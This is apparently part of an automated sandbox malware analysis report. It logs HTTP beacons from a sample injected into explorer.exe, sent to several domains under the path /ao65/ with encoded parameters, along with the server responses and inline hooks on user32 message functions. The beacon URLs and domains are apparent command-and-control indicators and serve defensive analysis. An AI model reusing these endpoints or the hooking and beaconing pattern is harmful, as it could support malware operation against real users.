                                                                                                  Nov 30, 2023 14:57:23.481544018 CET238OUTGET /ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.leathfortexas.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Nov 30, 2023 14:57:23.581691980 CET351INHTTP/1.1 403 Forbidden
                                                                                                  Server: openresty
                                                                                                  Date: Thu, 30 Nov 2023 13:57:23 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 150
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.64974834.93.103.39804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 14:58:03.063024998 CET240OUTGET /ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.optimusvisionlb.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Nov 30, 2023 14:58:03.408822060 CET605INHTTP/1.1 301 Moved Permanently
                                                                                                  Server: nginx
                                                                                                  Date: Thu, 30 Nov 2023 13:58:03 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 162
                                                                                                  Connection: close
                                                                                                  Location: https://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.649749104.140.89.24804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 14:58:24.506469965 CET232OUTGET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.maltsky.net
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.6497503.33.130.190804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 14:58:44.521867990 CET232OUTGET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.thnkotb.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Nov 30, 2023 14:58:44.626300097 CET514INHTTP/1.1 403 Forbidden
                                                                                                  Server: openresty
                                                                                                  Date: Thu, 30 Nov 2023 13:58:44 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 291
                                                                                                  Connection: close
                                                                                                  ETag: "6552b21e-123"
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.649751104.247.81.50804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 14:59:05.034219027 CET235OUTGET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.harmonicod.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Nov 30, 2023 14:59:05.162866116 CET343INHTTP/1.1 403 Forbidden
                                                                                                  Server: nginx
                                                                                                  Date: Thu, 30 Nov 2023 13:59:05 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 146
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.64975237.97.254.27804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 14:59:25.599111080 CET247OUTGET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.kermisbedrijfkramer.online
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Nov 30, 2023 14:59:25.780606985 CET1340INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                                                  Server: Apache
                                                                                                  Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Type: text/html
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  X-Varnish: 612203309 3
                                                                                                  Age: 6206594
                                                                                                  Via: 1.1 varnish (Varnish/6.1)
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 64668
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                  Nov 30, 2023 14:59:25.780627012 CET1340INData Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c 3d 22
                                                                                                  Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="
                                                                                                  Nov 30, 2023 14:59:25.780642986 CET1340INData Raw: 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63
                                                                                                  Data Ascii: 2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                  Nov 30, 2023 14:59:25.780658007 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                                  Nov 30, 2023 14:59:25.780670881 CET1340INData Raw: 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65
                                                                                                  Data Ascii: ved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <pa
                                                                                                  Nov 30, 2023 14:59:25.780683041 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c 31 2c
                                                                                                  Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-p
                                                                                                  Nov 30, 2023 14:59:25.780695915 CET1340INData Raw: 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72
                                                                                                  Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                  Nov 30, 2023 14:59:25.780708075 CET1340INData Raw: 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width="1
                                                                                                  Nov 30, 2023 14:59:25.780720949 CET1340INData Raw: 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e 33 34
                                                                                                  Data Ascii: h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g><
                                                                                                  Nov 30, 2023 14:59:25.780736923 CET1340INData Raw: 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: 25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-4.
                                                                                                  Nov 30, 2023 14:59:25.960726023 CET1340INData Raw: 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c 30 63
                                                                                                  Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,4.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.64975362.72.50.88804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 14:59:45.996751070 CET239OUTGET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.stellarskyline.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Nov 30, 2023 14:59:46.150660992 CET1143INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 707
                                                                                                  date: Thu, 30 Nov 2023 13:59:46 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.649754156.237.159.158804004C:\Windows\explorer.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Nov 30, 2023 15:00:09.039658070 CET231OUTGET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1
                                                                                                  Host: www.hivaom.top
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:


                                                                                                  Code Manipulations

                                                                                                  User Modules

                                                                                                  Hook Summary

                                                                                                  Function NameHook TypeActive in Processes
                                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                                  GetMessageWINLINEexplorer.exe
                                                                                                  GetMessageAINLINEexplorer.exe

                                                                                                  Processes

                                                                                                  Process: explorer.exe, Module: user32.dll
                                                                                                  Function NameHook TypeNew Data
                                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEE
                                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEE
                                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEE
                                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEE

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:14:56:03
                                                                                                  Start date:30/11/2023
                                                                                                  Path:C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2'403'840 bytes
